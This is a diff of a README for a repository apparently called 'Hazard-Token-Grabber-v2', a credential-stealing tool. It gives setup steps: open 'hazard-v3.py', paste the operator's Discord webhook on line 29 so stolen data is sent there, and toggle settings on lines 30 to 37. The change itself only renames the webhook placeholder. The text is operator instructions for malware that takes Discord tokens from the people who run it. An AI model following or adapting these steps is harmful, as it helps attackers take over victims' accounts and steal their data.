gumbobrot/Hazard-Token-Grabber-v2/README.md

 - Step 2: Enter the file named "hazard-v3.py" with any code editor.
 I would recommend you Visual Studio Code. (https://code.visualstudio.com/)

-- Step 3: Just put your webhook in line 29 where the code says "WEBHOOK HERE".
+- Step 3: Just put your webhook in line 29 where the code says "YOUR_WEBHOOK_HERE".
 Simply replace the webhook here with your webhook.
 You don't know how to create a webhook and copy it's URL? https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks

 - (Step 4:) You can also change the settings from line 30 to 37. (optional) True is enabling the setting, false is disbaling a setting.
 Easy!`